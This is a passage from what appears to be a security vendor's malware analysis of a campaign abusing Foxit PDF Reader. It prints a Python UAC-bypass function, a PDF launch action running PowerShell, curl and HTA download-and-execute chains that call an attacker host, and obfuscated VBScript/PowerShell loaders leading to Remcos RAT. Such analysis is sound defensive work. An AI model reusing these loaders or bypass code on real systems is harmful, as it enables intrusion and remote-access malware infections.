UACbypass(method: int=1) -\u003e bool:\r\n if Utility.GetSelf()[1]:\r\n execute = lambda cmd: subprocess.run(cmd, shell=True, capture_output=True)\r\n match method:\r\n case 1:\r\n execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.exec\r\n execute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateEx\r\n log_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operationa\r\n execute('computerdefaults --nouacbypass')\r\n log_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\r\n execute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\n if log_count_after \u003e log_count_before:\r\n return Utility.UACbypass(method + 1)\r\n case 2:\r\n execute(f'reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /d \"{sys.exec\r\n execute('reg add hkcu\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command /v \"DelegateEx\r\n log_count_before = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operationa\r\n execute('fodhelper --nouacbypass')\r\n log_count_after = len(execute('wevtutil qe \"Microsoft-Windows-Windows Defender/Operational\r\n execute('reg delete hkcu\\\\Software\\\\Classes\\\\ms-settings /f')\r\n if log_count_after \u003e log_count_before:\r\n return Utility.UACbypass(method + 1)\r\n case _:\r\n return False\r\n return True\r\nCode 15 – UAC bypass function.\r\nBlank-Grabber appears to be a fully functional open-source infostealer, and its low detection rate makes it an even bigger\r\nthreat for targeted users.\r\nCase IV. From PDF to PDF to … Remcos\r\nAnother interesting case occurred when a malicious PDF included a hyperlink to an attachment hosted on  trello.com .\r\nUpon downloading, it revealed a secondary PDF file containing malicious code, which takes advantage of this\r\n“exploitation” of Foxit Reader users. The attack chain is once again impressive, with multiple files being dropped in order to\r\ninfect the victim with the final payload. In total, more than 10 files were executed, with the final malware Remcos RAT\r\nbeing injected into memory using the DynnamicWrapperX.\r\nFigure 15 - Attack Chain leading to Remcos RAT\r\nFigure 15 – Attack Chain leading to Remcos RAT\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 17 of 32\n\nThe Threat Actor performing this campaign,  @Silentkillertv , appears to be selling also malicious tools via Telegram. On\r\nthe 27th of April, the Threat Actor published a PDF Exploit, which targets Foxit PDF Reader and has “100% Bypass of Anti-Viruses” as well as is able to bypass “Gmail, Yahoo, Facebook, and Hotmail file sharing restrictions”.\r\nFigure 16 - Telegram Channel.\r\nFigure 16 – Telegram Channel.\r\nCampaign Technical Analysis\r\nThe first PDF file contained a malicious hyperlink that downloaded a PDF file named\r\n“ Facebook_Adversting_project.pdf ”.\r\nFigure 17 - First PDF file.\r\nFigure 17 – First PDF file.\r\n/URI\r\n(hxxps://trello.com/1/cards/661a23427b01e8ba1bde8e2e/attachments/662d51f9e28ce98ab46ecd93/download/Facebook_Adversting_project.pdf)\r\nobj 119 0 Type: Referencing: \u003c\u003c /S /URI /URI\r\n(hxxps://trello.com/1/cards/661a23427b01e8ba1bde8e2e/attachments/662d51f9e28ce98ab46ecd93/download/Facebook_Adversting_project.pdf)\r\n\u003e\u003e\r\nobj 119 0\r\n Type:\r\n Referencing:\r\n \u003c\u003c\r\n /S /URI\r\n /URI (hxxps://trello.com/1/cards/661a23427b01e8ba1bde8e2e/attachments/662d51f9e28ce98ab46ecd93/download/Fa\r\n \u003e\u003e\r\nCode 16 – First PDF link.\r\nOnce clicking the link, the victim receives the second PDF file, which is hosted on trello.com a legitimate website.\r\nSimilar to Discord, Threat Actors have been taking advantage of legitimate websites in order to host and distribute malicious\r\nfiles.\r\nFigure 18 - The second PDF hosted on trello.com.\r\nFigure 18 – The second PDF hosted on trello.com.\r\nThe file was uploaded on the 27th of April by “ Bechtelar Libby @bechtelarlibby ”.\r\nFigure 19 -\r\nFigure 19 – PDF attached on 27th of April 2024\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 18 of 32\n\nThe user’s initial activity seems to date back to March 1st, 2024. Judging by the file and folder names generated by the\r\nsuspicious account, it appears that the targeted countries included Vietnam and Korea, among others.\r\nBảng Trello của tôi (Vietnamese): My Trello board\r\nLập kế hoạch dự án (Vietnamese): Project planning\r\nHọp khởi động (Vietnamese): Kickoff meeting\r\nCần làm (Vietnamese): Need to do\r\n거래 데이터 (Korean): Transaction data\r\n신원 확인 (Korean): Identity verification\r\nBảng Trello của tôi (Vietnamese): My Trello board Lập kế hoạch dự án (Vietnamese): Project planning Họp khởi động\r\n(Vietnamese): Kickoff meeting Cần làm (Vietnamese): Need to do Xong (Vietnamese): Done 거래 데이터 (Korean):\r\nTransaction data 신원 확인 (Korean): Identity verification\r\n Bảng Trello của tôi (Vietnamese): My Trello board\r\n Lập kế hoạch dự án (Vietnamese): Project planning\r\n Họp khởi động (Vietnamese): Kickoff meeting\r\n Cần làm (Vietnamese): Need to do\r\n Xong (Vietnamese): Done\r\n 거래 데이터 (Korean): Transaction data\r\n 신원 확인 (Korean): Identity verification\r\nFigure 20 - Activity traced back to the 1st of\r\nMarch.\r\nFigure 20 – Activity traced back to the 1st of March.\r\nIn the second PDF, the exploitation targeting Foxit users is executed through the following PowerShell command:\r\n/P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://www.digitalmarketingstart.com/GFFFDSGSDGDFSGDFSGDSG.lnk\\',\r\n\\'NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK\\')\"'\r\nVGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT \u0026@echo timeout\r\nVGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT \u0026@echo start NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK\r\n/OpenAction \u003c\u003c /S /Launch /Win \u003c\u003c /F (cmd.exe) /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object\r\nNet.WebClient).DownloadFile(\\'hxxps://www.digitalmarketingstart.com/GFFFDSGSDGDFSGDFSGDSG.lnk\\',\r\n\\'NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK\\')\"' \u003e\u003e VGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT\r\n\u0026@echo timeout / t 5 \u003e\u003e VGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT \u0026@echo start\r\nNCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK \u003e\u003e\r\n /OpenAction\r\n \u003c\u003c\r\n /S /Launch\r\n /Win\r\n \u003c\u003c\r\n /F (cmd.exe)\r\n /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://ww\r\n \u003e\u003e\r\n VGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT \u0026@echo timeout\r\n / t 5\r\n \u003e\u003e\r\n VGHJFUYTKFJFGJHFGKJHGFTGHDFKTGJH.BAT \u0026@echo start NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK\r\n \u003e\u003e\r\nCode 17 – Second PDF Foxit Exploitation.\r\nAt this point, multiple “links”/files need to be followed in order to retrieve the final payload. The first payload is\r\ndownloaded as  NCGHDFHGTDFJMDFGKJHFTYFUKFYU.LNK  and is a  .lnk . This file downloads using curl a  .hta  file from a\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 19 of 32\n\nremote server and executes it from this location  %AppData%\\STARTGOVFFGHJFKJHFTFDGHJF.HTA .\r\n/c mode 15,1 \u0026 .curl hxxps://digitalmarketingstart.com/PHOTO/photoSTARTGOUPDATEPHOTOVIWERGOSTART.JPG -\r\no %AppData%\\STARTGOVFFGHJFKJHFTFDGHJF.HTA \u0026 start /b\r\n%AppData%\\STARTGOVFFGHJFKJHFTFDGHJF.HTA\r\n/c mode 15,1 \u0026 .curl hxxps://digitalmarketingstart.com/PHOTO/photoSTARTGOUPDATEPHOTOVIWERGOSTART.JPG -\r\no %AppData%\\STARTGOVFFGHJFKJHFTFDGHJF.HTA \u0026 start /b\r\n%AppData%\\STARTGOVFFGHJFKJHFTFDGHJF.HTA\r\n/c mode 15,1 \u0026 .curl hxxps://digitalmarketingstart.com/PHOTO/photoSTARTGOUPDATEPHOTOVIWERGOSTART.JPG -o %AppDa\r\nCode 18 – 1st Payload, .lnk file command.\r\nThe HTA file initiates two requests to the identical server, fetching two files. One is a VBScript file, while the other is a\r\ngenuine image, utilized as a decoy. Notably, this HTA file contained comments written in Arabic.\r\n\u003cscript language=\"VBScript\"\u003e\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nتحديد روابط التحميل للملفات '\r\nurlVBS = \"hxxps://digitalmarketingstart.com/PHOTO/PHOTOphoto_2024-04-27_07-31-10.jpg\" ' األول الملف رابط\r\n(FILE.VBS)\r\nurlJPG = \"hxxps://digitalmarketingstart.com/photo_2024-04-27_07-31-10.jpg\" ' الثاني الملف رابط) FILE.JPG)\r\nلكل ملف على حدة curl تنفيذ أمر التحميل باستخدام '\r\ncommandVBS = \"cmd.exe /c mode 15,1 \u0026 curl \" \u0026 urlVBS \u0026 \" -o\r\n%temp%\\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS \u0026 start /b\r\n%temp%\\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS\"\r\ncommandJPG = \"cmd.exe /c mode 15,1 \u0026 curl \" \u0026 urlJPG \u0026 \" -o %temp%\\photo_2024-04-27_07-31-10.jpg \u0026 start /b\r\n%temp%\\photo_2024-04-27_07-31-10.jpg\"\r\nتنفيذ أوامر التحميل لكل ملف بشكل متواٍز '\r\nobjShell.Run commandVBS, 0, True\r\nobjShell.Run commandJPG, 0, True\r\nالحالي بعد التحميل HTA حذف ملف '\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nstrScriptPath = objFSO.GetAbsolutePathName(Replace(document.location.pathname, \"/\", \"\\\"))\r\nobjFSO.DeleteFile strScriptPath\r\nHTA إغالق نافذة التطبيق '\r\n\u003chtml\u003e \u003chead\u003e \u003cscript language=\"VBScript\"\u003e Set objShell = CreateObject(\"WScript.Shell\") ' للملفات التحميل روابط تحديد\r\nDim urlVBS, urlJPG urlVBS = \"hxxps://digitalmarketingstart.com/PHOTO/PHOTOphoto_2024-04-27_07-31-10.jpg\" ' رابط\r\nاألول الملف) FILE.VBS) urlJPG = \"hxxps://digitalmarketingstart.com/photo_2024-04-27_07-31-10.jpg\" ' الثاني الملف رابط\r\n(FILE.JPG) ' باستخدام التحميل أمر تنفيذ curl حدة على ملف لكل commandVBS = \"cmd.exe /c mode 15,1 \u0026 curl \" \u0026 urlVBS \u0026 \" -o\r\n%temp%\\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS \u0026 start /b\r\n%temp%\\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS\" commandJPG = \"cmd.exe /c mode 15,1 \u0026 curl \" \u0026 urlJPG \u0026\r\n\" -o %temp%\\photo_2024-04-27_07-31-10.jpg \u0026 start /b %temp%\\photo_2024-04-27_07-31-10.jpg\" ' لكل التحميل أوامر تنفيذ\r\nزٍمتوا بشكل ملف objShell.Run commandVBS, 0, True objShell.Run commandJPG, 0, True ' ملف حذف HTA التحميل بعد الحالي Set\r\nobjFSO = CreateObject(\"Scripting.FileSystemObject\") strScriptPath =\r\nobjFSO.GetAbsolutePathName(Replace(document.location.pathname, \"/\", \"\\\")) objFSO.DeleteFile strScriptPath ' نافذة إغالق\r\nالتطبيق HTA window.close \u003c/script\u003e \u003c/head\u003e \u003cbody\u003e \u003c/body\u003e \u003c/html\u003e\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n\u003cscript language=\"VBScript\"\u003e\r\n Set objShell = CreateObject(\"WScript.Shell\")\r\nتحديد روابط التحميل للملفات ' \r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 20 of 32\n\nDim urlVBS, urlJPG\r\n urlVBS = \"hxxps://digitalmarketingstart.com/PHOTO/PHOTOphoto_2024-04-27_07-31-10.jpg\" ' األول الملف رابط) FI\r\n urlJPG = \"hxxps://digitalmarketingstart.com/photo_2024-04-27_07-31-10.jpg\" ' الثاني الملف رابط) FILE.JPG)\r\nلكل ملف على حدة curl تنفيذ أمر التحميل باستخدام ' \r\n commandVBS = \"cmd.exe /c mode 15,1 \u0026 curl \" \u0026 urlVBS \u0026 \" -o %temp%\\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS \u0026 st\r\n commandJPG = \"cmd.exe /c mode 15,1 \u0026 curl \" \u0026 urlJPG \u0026 \" -o %temp%\\photo_2024-04-27_07-31-10.jpg \u0026 start /\r\nتنفيذ أوامر التحميل لكل ملف بشكل متواٍز ' \r\n objShell.Run commandVBS, 0, True\r\n objShell.Run commandJPG, 0, True\r\nالحالي بعد التحميل HTA حذف ملف ' \r\n Set objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\n strScriptPath = objFSO.GetAbsolutePathName(Replace(document.location.pathname, \"/\", \"\\\"))\r\n objFSO.DeleteFile strScriptPath\r\nHTA إغالق نافذة التطبيق ' \r\n window.close\r\n\u003c/script\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nCode 19 – 2nd Payload, .hta file content.\r\nThe third payload is stored as  %temp%\\FGHJFTFDHBJVJHGVHJKFVJGTFKHFJH.VBS  and is executed before the genuine image.\r\nThis VBScript is straightforward, downloading additional VBScript code and executing the “response” accordingly.\r\nExecute(\"set H___________________K=CreateObject(\"\"MSXML2.XMLHTTP\"\"):H___________________K.Open\r\n\"\"POST\"\",\"\"hxxps://www.digitalmarketingstart.com/digitalmarketing/STARTPOWER2642024GO___________________________AUTO.MP4\"\",false:H\r\nExecute(\"set H___________________K=CreateObject(\"\"MSXML2.XMLHTTP\"\"):H___________________K.Open\r\n\"\"POST\"\",\"\"hxxps://www.digitalmarketingstart.com/digitalmarketing/STARTPOWER2642024GO___________________________AUTO.MP4\"\",false:H\r\nExecute(\"set H___________________K=CreateObject(\"\"MSXML2.XMLHTTP\"\"):H___________________K.Open \"\"POST\"\",\"\"hxxp\r\nCode 20 – 3rd Payload, VBScript file content.\r\nThe VBScript code executes the following command:\r\nmshta hxxps://www.digitalmarketingstart.com/digitalmarketing/ENCLUCKSAQSTART.TXT\r\nmshta hxxps://www.digitalmarketingstart.com/digitalmarketing/ENCLUCKSAQSTART.TXT\r\nmshta hxxps://www.digitalmarketingstart.com/digitalmarketing/ENCLUCKSAQSTART.TXT\r\nCode 21 – 4th Payload, VBScript code.\r\nThe fifth payload is yet another  .hta  file that communicates with the same endpoint. It downloads and executes another\r\nVBScript file (sixth), which in turn downloads yet another VBScript file (seventh).\r\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e\r\n\u003cscript language=\"VBScript\"\u003e\r\nWindow.moveTo -7000,-7000\r\nConst RWQICZXUBCOZEYOXXOLPHN = 0\r\nWQCRFZGGQLHDIRTXIFVENK = \".\"\r\nYLVTDQQXKKQGPFGEOSJZOP = \"$HEVCFLOVSDUCGFHQTKFAHKD = '[]\u003c)#]1%$-63\u003c578699)@3#y]\r\n\u003c)#]1%$-63\u003c578699)@3#t@%\\@2351$@4^^\u0026+\u00263521_43\u003c/\u00262*6_-\\!^/61[5!^\\$@.IO.]\r\n\u003c)#]1%$-63\u003c578699)@3#t6}}=\u0026_3+#-$^(5^\u0026/@9--+@%\\@2351$@4^^\u0026+\u00263521_4])=+^-6^!2=993*!\u0026^\\=\u003c!3\u003c/\u00262*6_-\r\n\\!^/61[5!^\\$@6}}=\u0026_3+#-$^(5^\u0026/@9--+@%\\@2351$@4^^\u0026+\u00263521_4])=+^-6^!2=993*!\u0026^\\=\r\n\u003c!d@%\\@2351$@4^^\u0026+\u00263521_46}}=\u0026_3+#-$^(5^\u0026/@9--+]'.Replace(']\r\n\u003c)#]1%$-63\u003c578699)@3#','S').Replace('@%\\@2351$@4^^\u0026+\u00263521_4','E').Replace('6}}=\u0026_3+#-$^(5^\u0026/@9--\r\n+','R').Replace('])=+^-6^!2=993*!\u0026^\\=\u003c!','A').Replace('3\u003c/\u00262*6_-\\!^/61[5!^\\$@','M');\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 21 of 32\n\n$HQZNQSANBGESOEVVYSOBKZQ = ($HEVCFLOVSDUCGFHQTKFAHKD -Join '')|\u0026('I'+'EX');\r\n$HSCYFSROAUPLLCWDPFTSSSZ = '[-!]#\u003c)}-[1=\u0026*=-/=)0_0}y-!]#\u003c)}-[1=\u0026*=-/=)0_0}-$)047)[({2\\$40(!5$9{)\\\r\n{4@0+!*83\\=8(_)**[\u003c3!m.N\\{4@0+!*83\\=8(_)**[\u003c3!-$)047)[({2\\$40(!5$9{).W\\{4@0+!*83\\=8(_)**[\u003c3!bR\\\r\n{4@0+!*83\\=8(_)**[\u003c3!qu\\{4@0+!*83\\=8(_)**[\u003c3!-!]#\u003c)}-[1=\u0026*=-/=)0_0}-$)047)[({2\\$40(!5$9{)]'.Replace('-!]#\u003c)}-\r\n[1=\u0026*=-/=)0_0}','S').Replace('\\{4@0+!*83\\=8(_)**[\u003c3!','E').Replace('-$)047)[({2\\$40(!5$9{)','T');\r\n$HVILEIYVLFQVNERXEWCGCXO = ($HSCYFSROAUPLLCWDPFTSSSZ -Join '')|\u0026\r\n('I'+'EX');$HVSQXGOSZZWOBNBTGXRCCZL =\r\n'\u0026@_-)*0%\u00263@]3*9/-3]7!5r0(#9@{/8_\u003c86!95505!/82a#!#!%26@*34@32@!6\u0026\u00260##0(#9@{/8_\u003c86!95505!/82'.Replace('\u0026@_-)*0%\u00263@]3*9/-3]7!5\r\n;$HJCNHHHRXRCBHPAEKDHSXUX = '_]81{)-=]#\\872]20\\39$53\u003c73-//{#/_1+\u00264%8*(}7+tR3\u003c73-//{#/_1+\u00264%8*\r\n(}7+%}[0%58)75/^{8}=[}-41\u003cpon%}[0%58)75/^{8}=[}-41\u003c3\u003c73-//{#/_1+\u00264%8*(}7+'.Replace('_]81{)-\r\n=]#\\872]20\\39$5','G').Replace('3\u003c73-//{#/_1+\u00264%8*(}7+','E').Replace('%}[0%58)75/^{8}=[}-41\u003c','S');\r\n$HDRRVVKQKQNGJTRCWXTFBBJ = 'G36=[_^+{34+%8+\\48#/+$!t\u0026#-$^#!/\u002679346)265}]\u0026[36=[_^+\r\n{34+%8+\\48#/+$!(6@!\\}_\u0026+(/#^@7%%}*{=^pon(6@!\\}_\u0026+(/#^@7%%}*{=^36=[_^+{34+%8+\\48#/+$!(6@!\\}_\u0026+\r\n(/#^@7%%}*{=^t\u0026#-$^#!/\u002679346)265}]\u0026[36=[_^+{34+%8+\\48#/+$!am'.Replace('(6@!\\}_\u0026+(/#^@7%%}*\r\n{=^','S').Replace('36=[_^+{34+%8+\\48#/+$!','E').Replace('\u0026#-$^#!/\u002679346)265}]\u0026[','R');\r\n$HQLHKKPKITBTDYXPDFDXDCN = '=14\u0026\u0026!*6}12=_047\u003c0$4*%75(-^77{]*}_+=!\u003c[\u003c@@#8a1#\u00260\\/6^%#08}/\\-\r\n[@/15^To75(-^77{]*}_+=!\u003c[\u003c@@#8n1#\u00260\\/6^%#08}/\\-[@/15^'.Replace('=14\u0026\u0026!*6}12=_047\u003c0$4*%','R').Replace('75(-\r\n^77{]*}_+=!\u003c[\u003c@@#8','E').Replace('1#\u00260\\/6^%#08}/\\-[@/15^','D');\r\n\u0026('I'+'EX')\r\n($HQZNQSANBGESOEVVYSOBKZQ::new($HVILEIYVLFQVNERXEWCGCXO::$HVSQXGOSZZWOBNBTGXRCCZL('hxxps://www.digitalmark\r\nDUHJKVWUERPRNNKARQDOXB = StrReverse(\" \"+\"l\"+\"l\"+\"e\"+\"h\"+\"s\"+\"r\"+\"e\"+\"w\"+\"o\"+\"p\")\r\nSet ITTTPGKCLFFSQRFUUWYUSV = GetObject(StrReverse(\":\"+\"s\"+\"t\"+\"m\"+\"g\"+\"m\"+\"n\"+\"i\"+\"w\") _\r\n\u0026\r\nStrReverse(\"\\\"+\"\\\"+\"!\"+\"}\"+\"e\"+\"t\"+\"a\"+\"n\"+\"o\"+\"s\"+\"r\"+\"e\"+\"p\"+\"m\"+\"i\"+\"=\"+\"l\"+\"e\"+\"v\"+\"e\"+\"L\"+\"n\"+\"o\"+\"i\"+\"t\"+\"a\"+\"n\"+\"o\"+\"s\"+\"r\"+\"e\"+\"p\r\n{\") _\r\n\u0026 WQCRFZGGQLHDIRTXIFVENK \u0026 StrReverse(\"2\"+\"v\"+\"m\"+\"i\"+\"c\"+\"\\\"+\"t\"+\"o\"+\"o\"+\"r\"+\"\\\"))\r\nSet RPFCRWSNXWFCEAQKDKOGWP =\r\nITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"p\"+\"u\"+\"t\"+\"r\"+\"a\"+\"t\"+\"S\"+\"s\"+\"se\"+\"c\"+\"o\"+\"r\"+\"P\"+\"_\"+\"2\"+\"3\"+\"n\"+\"i\"+\"W\"))\r\nSet NDGKJWLKGWSPQZGHKLTLZG = RPFCRWSNXWFCEAQKDKOGWP.SpawnInstance_\r\nNDGKJWLKGWSPQZGHKLTLZG.ShowWindow = RWQICZXUBCOZEYOXXOLPHN\r\nSet WTQVYZLZBRCALBUSHDHPJG =\r\nITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"s\"+\"s\"+\"e\"+\"c\"+\"o\"+\"r\"+\"P\"+\"_\"+\"2\"+\"3\"+\"n\"+\"i\"+\"W\"))\r\nRASUVEQBLDGPFLLFXDQZRH = WTQVYZLZBRCALBUSHDHPJG.Create _\r\n(DUHJKVWUERPRNNKARQDOXB+YLVTDQQXKKQGPFGEOSJZOP, Null, NDGKJWLKGWSPQZGHKLTLZG,\r\nintProcessID)\r\n\u003cHTML\u003e \u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e \u003cHEAD\u003e \u003cscript language=\"VBScript\"\u003e\r\nWindow.ReSizeTo 0, 0 Window.moveTo -7000,-7000 Const RWQICZXUBCOZEYOXXOLPHN = 0\r\nWQCRFZGGQLHDIRTXIFVENK = \".\" YLVTDQQXKKQGPFGEOSJZOP = \"$HEVCFLOVSDUCGFHQTKFAHKD =\r\n'[]\u003c)#]1%$-63\u003c578699)@3#y]\u003c)#]1%$-63\u003c578699)@3#t@%\\@2351$@4^^\u0026+\u00263521_43\u003c/\u00262*6_-\\!^/61[5!^\\$@.IO.]\r\n\u003c)#]1%$-63\u003c578699)@3#t6}}=\u0026_3+#-$^(5^\u0026/@9--+@%\\@2351$@4^^\u0026+\u00263521_4])=+^-6^!2=993*!\u0026^\\=\u003c!3\u003c/\u00262*6_-\r\n\\!^/61[5!^\\$@6}}=\u0026_3+#-$^(5^\u0026/@9--+@%\\@2351$@4^^\u0026+\u00263521_4])=+^-6^!2=993*!\u0026^\\=\r\n\u003c!d@%\\@2351$@4^^\u0026+\u00263521_46}}=\u0026_3+#-$^(5^\u0026/@9--+]'.Replace(']\r\n\u003c)#]1%$-63\u003c578699)@3#','S').Replace('@%\\@2351$@4^^\u0026+\u00263521_4','E').Replace('6}}=\u0026_3+#-$^(5^\u0026/@9--\r\n+','R').Replace('])=+^-6^!2=993*!\u0026^\\=\u003c!','A').Replace('3\u003c/\u00262*6_-\\!^/61[5!^\\$@','M');\r\n$HQZNQSANBGESOEVVYSOBKZQ = ($HEVCFLOVSDUCGFHQTKFAHKD -Join '')|\u0026('I'+'EX');\r\n$HSCYFSROAUPLLCWDPFTSSSZ = '[-!]#\u003c)}-[1=\u0026*=-/=)0_0}y-!]#\u003c)}-[1=\u0026*=-/=)0_0}-$)047)[({2\\$40(!5$9{)\\\r\n{4@0+!*83\\=8(_)**[\u003c3!m.N\\{4@0+!*83\\=8(_)**[\u003c3!-$)047)[({2\\$40(!5$9{).W\\{4@0+!*83\\=8(_)**[\u003c3!bR\\\r\n{4@0+!*83\\=8(_)**[\u003c3!qu\\{4@0+!*83\\=8(_)**[\u003c3!-!]#\u003c)}-[1=\u0026*=-/=)0_0}-$)047)[({2\\$40(!5$9{)]'.Replace('-!]#\u003c)}-\r\n[1=\u0026*=-/=)0_0}','S').Replace('\\{4@0+!*83\\=8(_)**[\u003c3!','E').Replace('-$)047)[({2\\$40(!5$9{)','T');\r\n$HVILEIYVLFQVNERXEWCGCXO = ($HSCYFSROAUPLLCWDPFTSSSZ -Join '')|\u0026\r\n('I'+'EX');$HVSQXGOSZZWOBNBTGXRCCZL =\r\n'\u0026@_-)*0%\u00263@]3*9/-3]7!5r0(#9@{/8_\u003c86!95505!/82a#!#!%26@*34@32@!6\u0026\u00260##0(#9@{/8_\u003c86!95505!/82'.Replace('\u0026@_-)*0%\u00263@]3*9/-3]7!5\r\n;$HJCNHHHRXRCBHPAEKDHSXUX = '_]81{)-=]#\\872]20\\39$53\u003c73-//{#/_1+\u00264%8*(}7+tR3\u003c73-//{#/_1+\u00264%8*\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 22 of 32\n\n(}7+%}[0%58)75/^{8}=[}-41\u003cpon%}[0%58)75/^{8}=[}-41\u003c3\u003c73-//{#/_1+\u00264%8*(}7+'.Replace('_]81{)-\r\n=]#\\872]20\\39$5','G').Replace('3\u003c73-//{#/_1+\u00264%8*(}7+','E').Replace('%}[0%58)75/^{8}=[}-41\u003c','S');\r\n$HDRRVVKQKQNGJTRCWXTFBBJ = 'G36=[_^+{34+%8+\\48#/+$!t\u0026#-$^#!/\u002679346)265}]\u0026[36=[_^+\r\n{34+%8+\\48#/+$!(6@!\\}_\u0026+(/#^@7%%}*{=^pon(6@!\\}_\u0026+(/#^@7%%}*{=^36=[_^+{34+%8+\\48#/+$!(6@!\\}_\u0026+\r\n(/#^@7%%}*{=^t\u0026#-$^#!/\u002679346)265}]\u0026[36=[_^+{34+%8+\\48#/+$!am'.Replace('(6@!\\}_\u0026+(/#^@7%%}*\r\n{=^','S').Replace('36=[_^+{34+%8+\\48#/+$!','E').Replace('\u0026#-$^#!/\u002679346)265}]\u0026[','R');\r\n$HQLHKKPKITBTDYXPDFDXDCN = '=14\u0026\u0026!*6}12=_047\u003c0$4*%75(-^77{]*}_+=!\u003c[\u003c@@#8a1#\u00260\\/6^%#08}/\\-\r\n[@/15^To75(-^77{]*}_+=!\u003c[\u003c@@#8n1#\u00260\\/6^%#08}/\\-[@/15^'.Replace('=14\u0026\u0026!*6}12=_047\u003c0$4*%','R').Replace('75(-\r\n^77{]*}_+=!\u003c[\u003c@@#8','E').Replace('1#\u00260\\/6^%#08}/\\-[@/15^','D'); \u0026('I'+'EX')\r\n($HQZNQSANBGESOEVVYSOBKZQ::new($HVILEIYVLFQVNERXEWCGCXO::$HVSQXGOSZZWOBNBTGXRCCZL('hxxps://www.digitalmark\r\nDUHJKVWUERPRNNKARQDOXB = StrReverse(\" \"+\"l\"+\"l\"+\"e\"+\"h\"+\"s\"+\"r\"+\"e\"+\"w\"+\"o\"+\"p\") Set\r\nITTTPGKCLFFSQRFUUWYUSV = GetObject(StrReverse(\":\"+\"s\"+\"t\"+\"m\"+\"g\"+\"m\"+\"n\"+\"i\"+\"w\") _ \u0026\r\nStrReverse(\"\\\"+\"\\\"+\"!\"+\"}\"+\"e\"+\"t\"+\"a\"+\"n\"+\"o\"+\"s\"+\"r\"+\"e\"+\"p\"+\"m\"+\"i\"+\"=\"+\"l\"+\"e\"+\"v\"+\"e\"+\"L\"+\"n\"+\"o\"+\"i\"+\"t\"+\"a\"+\"n\"+\"o\"+\"s\"+\"r\"+\"e\"+\"p\r\n{\") _ \u0026 WQCRFZGGQLHDIRTXIFVENK \u0026 StrReverse(\"2\"+\"v\"+\"m\"+\"i\"+\"c\"+\"\\\"+\"t\"+\"o\"+\"o\"+\"r\"+\"\\\")) Set\r\nRPFCRWSNXWFCEAQKDKOGWP =\r\nITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"p\"+\"u\"+\"t\"+\"r\"+\"a\"+\"t\"+\"S\"+\"s\"+\"se\"+\"c\"+\"o\"+\"r\"+\"P\"+\"_\"+\"2\"+\"3\"+\"n\"+\"i\"+\"W\"))\r\nSet NDGKJWLKGWSPQZGHKLTLZG = RPFCRWSNXWFCEAQKDKOGWP.SpawnInstance_\r\nNDGKJWLKGWSPQZGHKLTLZG.ShowWindow = RWQICZXUBCOZEYOXXOLPHN ' Create Notepad process Set\r\nWTQVYZLZBRCALBUSHDHPJG =\r\nITTTPGKCLFFSQRFUUWYUSV.Get(StrReverse(\"s\"+\"s\"+\"e\"+\"c\"+\"o\"+\"r\"+\"P\"+\"_\"+\"2\"+\"3\"+\"n\"+\"i\"+\"W\"))\r\nRASUVEQBLDGPFLLFXDQZRH = WTQVYZLZBRCALBUSHDHPJG.Create _\r\n(DUHJKVWUERPRNNKARQDOXB+YLVTDQQXKKQGPFGEOSJZOP, Null, NDGKJWLKGWSPQZGHKLTLZG,\r\nintProcessID) self.close \u003c/script\u003e \u003cbody\u003e HBar \u003c/body\u003e \u003c/HEAD\u003e \u003c/HTML\u003e\r\n\u003cHTML\u003e\r\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e\r\n\u003cHEAD\u003e\r\n\u003cscript language=\"VBScript\"\u003e\r\nWindow.ReSizeTo 0, 0\r\nWindow.moveTo -7000,-7000\r\nConst 